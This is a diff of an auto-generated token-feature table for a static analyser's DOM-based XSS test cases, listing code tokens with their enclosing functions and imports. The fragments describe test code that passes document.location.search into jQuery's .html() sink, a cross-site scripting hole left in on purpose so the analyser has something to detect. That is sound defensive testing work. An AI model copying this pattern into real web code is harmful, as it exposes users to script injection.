URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | exceptional return of $('myId') | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | exceptional return of $('myId') | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:16 | $('myId').html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:16 | $('myId').html | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:16 | $('myId').html | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | $('myId').html(s) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | $('myId').html(s) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | $('myId').html(s) | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | $('myId').html(s) | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | $('myId').html(s) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | exceptional return of $('myId').html(s) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | exceptional return of $('myId').html(s) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | exceptional return of $('myId').html(s) | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | exceptional return of $('myId').html(s) | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:19 | exceptional return of $('myId').html(s) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:62:5:62:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:62:5:62:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:62:5:62:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16193,6 +113057,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:62:5:62:10 | 'myId' | enclosingFunctionBody | s $ myId html s | | autogenerated/Xss/DomBasedXss/tst.js:62:5:62:10 | 'myId' | enclosingFunctionName | dangerouslySetInnerHtml | | autogenerated/Xss/DomBasedXss/tst.js:62:5:62:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:62:13:62:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:13:62:16 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:13:62:16 | html | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:62:13:62:16 | html | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:62:13:62:16 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:62:18:62:18 | s | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:62:18:62:18 | s | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:62:18:62:18 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16200,21 +113069,203 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:62:18:62:18 | s | enclosingFunctionBody | s $ myId html s | | autogenerated/Xss/DomBasedXss/tst.js:62:18:62:18 | s | enclosingFunctionName | dangerouslySetInnerHtml | | autogenerated/Xss/DomBasedXss/tst.js:62:18:62:18 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:23 | dangero ... nerHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:23 | dangero ... nerHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:23 | dangero ... nerHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:49 | dangero ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:49 | dangero ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:49 | dangero ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:49 | exceptional return of dangero ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:49 | exceptional return of dangero ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:1:64:49 | exceptional return of dangero ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:32 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:32 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:32 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:41 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:41 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:41 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:48 | documen ... .search | CalleeFlexibleAccessPath | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:48 | documen ... .search | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:48 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:48 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:25:64:48 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:34:64:41 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:34:64:41 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:34:64:41 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:64:43:64:48 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:64:43:64:48 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:64:43:64:48 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:23 | dangero ... nerHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:23 | dangero ... nerHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:23 | dangero ... nerHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:49 | dangero ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:49 | dangero ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:49 | dangero ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:49 | exceptional return of dangero ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:49 | exceptional return of dangero ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:1:65:49 | exceptional return of dangero ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:32 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:32 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:32 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:41 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:41 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:41 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:48 | documen ... .search | CalleeFlexibleAccessPath | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:48 | documen ... .search | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:48 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:48 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:25:65:48 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:34:65:41 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:34:65:41 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:34:65:41 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:65:43:65:48 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:65:43:65:48 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:65:43:65:48 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:1 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:1 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:9 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:9 | $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:9 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:9 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:9 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:9 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:14 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| 